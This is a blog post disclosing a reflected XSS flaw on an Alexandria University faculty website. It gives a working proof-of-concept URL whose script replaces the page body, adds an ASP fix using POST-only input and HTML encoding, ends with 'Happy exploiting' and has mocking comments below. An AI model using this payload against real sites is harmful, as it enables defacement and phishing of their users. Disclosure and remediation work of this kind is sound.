Alexandria University: Faculty of Commerce.. vulnerable to XSS

Hi again,

The Faculty of Commerce website at Alexandria University is vulnerable to XSS attacks.

An attacker could easily lure a victim into clicking a crafted URL, which could then be used to display malicious or possibly incorrect content on the web page.

Although the form in the page source specifies POST rather than GET, the ASP page is coded to handle both, perhaps with POST preferred over GET when it is provided.

PoC:

hxxp://www.alex-commerce.edu.eg/Result42.asp?fld1=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27body%27%29[0].innerHTML=%27%3Ch1%3EXSS%20Vulnerability%20-%20by%20Xacker%3C/h1%3E%27%3C/script%3E
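
A server-side fix for the behaviour described above, as an added example rather than the site's actual code. It assumes Result42.asp reads `fld1` through the generic `Request` collection and echoes it into a double-quoted attribute, which is what the `">` prefix in the PoC suggests; the form markup and variable names are hypothetical.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit

' Vulnerable pattern (assumed for illustration, not the site's real source):
'   Response.Write "<input name=""fld1"" value=""" & Request("fld1") & """>"
' Request(...) searches the query string as well as the POST body, and the
' value is written back without any output encoding.

Dim method, fld1
method = UCase(Request.ServerVariables("REQUEST_METHOD"))

' 1. Accept the value only the way the form submits it: POST.
If method <> "POST" Then
    Response.Status = "405 Method Not Allowed"
    Response.AddHeader "Allow", "POST"
    Response.End
End If

' 2. Read from the form body only; a fld1 in the query string is ignored.
fld1 = Trim(Request.Form("fld1"))

' 3. Encode at the point of output. Server.HTMLEncode turns < > & and "
'    into entities, so the value cannot close the attribute or open a tag.
'    Steps 1 and 2 only narrow how the value can arrive; step 3 is the
'    control that removes the injection.
%>
<form method="post" action="Result42.asp">
  <input type="text" name="fld1" value="<%= Server.HTMLEncode(fld1) %>">
  <input type="submit" value="Search">
</form>
```

With this in place the PoC value is rendered as literal text inside the input field instead of being parsed as markup.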

Happy exploiting.

3 Responses to “Alexandria University: Faculty of Commerce.. vulnerable to XSS”

  1. Wael Dalloul Says:

    😀, God help the universities until someone graduated.

  2. HaHaHaHa
    Shame, I miss ’em already😄

  3. He will do it for sure😀
